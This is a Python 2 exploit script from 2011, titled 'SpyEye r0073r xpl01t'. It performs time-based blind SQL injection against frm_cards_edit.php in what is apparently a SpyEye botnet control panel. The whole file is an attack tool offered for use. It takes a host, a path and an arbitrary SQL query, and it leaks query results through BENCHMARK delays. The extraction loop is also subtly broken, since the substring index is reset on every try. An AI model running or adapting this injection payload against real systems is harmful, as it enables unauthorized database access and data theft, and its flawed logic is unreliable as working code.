SpyEye r0073r xpl01t

1. #!/usr/bin/python
2.  
3. from httplib import HTTPConnection
4. from time import time
5. from sys import exit, argv, stdout
6. import urllib
7. print """
8.  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
9.  0    __                  ____          __      ____                    1
10.  1   /' \           __  /'__`\       /\ \__  /'__`\                  0
11.  0  /\_, \   ___   /\_\/\_\ \ \   ___\ \ ,_\/\ \/\ \ _ ___           1
12.  1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\         0
13.  0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
14.  1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\ \__\ \ \____/\ \_\          0
15.  0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
16.  1                  \ \____/                                            0
17.  0                   \/___/                                             1
18.  1                                       >> SpyEye r0073r xpl01t        0
19.  0                                       >> author : Sanjar Satsura     1
20.  1                                       >> sanjar[at]xakep[dot]ru      0
21.  0                                       >> Public v.0.1                1
22.  1                                       >> )c(  2011                   0
23.  0                                                                      1
24.  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
25.  
26.  Example:                                                        
27.  Spyeye_r0073r <host>/dir/"version()"                        
28.  
29. """
30.  
31. if len(argv)<=3: exit()
32. else:   print "[+]Started pwn..."
33.  
34. host = argv[1]
35. path = argv[2]
36. sql = argv[3]
37. port = 80
38.  
39.  
40. hash = ""
41. full = []
42.  
43. for k in range(48,122):
44.     full.append(k)
45. full.append(0)
46. # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
47. # This is the charset to try
48.  
49. delay = 0.5
50. a=1
51. while a <= 32:
52.     for i in full:
53.         j = 0
54.         if i == 0:  exit('\n[+]Finished\n')
55.         #
56.         start = time()
57.         # start time for the delay
58.         conn = HTTPConnection(host,port)
59.         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
60.         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
61.         data = urllib.urlencode(values)
62.         print data
63.         conn.request("GET", path + "frm_cards_edit.php?" + data )
64.         response = conn.getresponse()
65.         read = response.read()    
66.         print read
67.          
68.         if response.status == 404: exit('[+]404')
69.         #404
70.         now = time()
71.         if now - start > delay:
72.         #has come true then the character is valid
73.             stdout.write(chr(i))
74.             stdout.flush()
75.             hash += chr(i)
76.             a += 1
77.             break;
78.         else: j += 1
79.         print "i vale %s, y J vale %s" %(i,j)
80.        
81.        
82.        
83. # w4tch u. h4ck u. fuck u. 1337day
84. # www.r00tw0rm.com